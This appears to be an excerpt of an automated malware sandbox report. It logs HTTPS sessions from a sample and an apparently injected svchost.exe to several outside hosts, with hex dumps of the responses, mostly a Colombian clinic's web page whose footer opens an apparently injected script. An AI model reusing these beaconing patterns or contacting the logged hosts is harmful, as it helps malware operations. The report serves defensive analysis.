                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC642INData Raw: 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                        Data Ascii: class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC643INData Raw: 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f
                                                                                                                                                                                                                                                                        Data Ascii: class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-compo
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC644INData Raw: 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63
                                                                                                                                                                                                                                                                        Data Ascii: ><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup bac
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC646INData Raw: 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66
                                                                                                                                                                                                                                                                        Data Ascii: : 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gaf
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC647INData Raw: 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72
                                                                                                                                                                                                                                                                        Data Ascii: ById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC648INData Raw: 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d
                                                                                                                                                                                                                                                                        Data Ascii: ock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC650INData Raw: 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62
                                                                                                                                                                                                                                                                        Data Ascii: /home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedb
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC651INData Raw: 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20
                                                                                                                                                                                                                                                                        Data Ascii: pecialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC652INData Raw: 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                        Data Ascii: -home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class=
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC654INData Raw: 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a 3c 64
                                                                                                                                                                                                                                                                        Data Ascii: ss="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer"><d
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC655INData Raw: 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72
                                                                                                                                                                                                                                                                        Data Ascii: e atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></br
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC656INData Raw: 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35 37 20
                                                                                                                                                                                                                                                                        Data Ascii: /div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +57
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC658INData Raw: 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                        Data Ascii: ticle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-conte
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC659INData Raw: 34 34 36 0d 0a 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74
                                                                                                                                                                                                                                                                        Data Ascii: 446 type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="text
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC660INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        34192.168.2.65364249.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC548OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        35192.168.2.654274188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC566OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC576INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:16 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lFEg0W6Vvl5%2F0BPgaw5ipmzNptxCM5N3qRiSPlgXSgSa2mVGPEa3GmKEQMO6CW80cT8g0xJtCxI%2BIjp%2FOR13Ar06JMSruIvUIYvro65mB13ijJAFxaDdwKa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a823cae69183-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC576INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC577INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        36192.168.2.65369549.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC567OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        37192.168.2.654324188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC567OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC567INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ha6ROOXtmaSyabDQJ5U2sCfz7a%2Bo85eNV%2FwnISKr9YjsG0pv4GDYC55S%2FmlfGez2b6UrhmZx2LZ%2Bjqnlmg%2Bfooqae27B6jLr%2FHOAhJQHzD9bh2xo%2BX%2FPK0gttyN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8241bfd360e-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
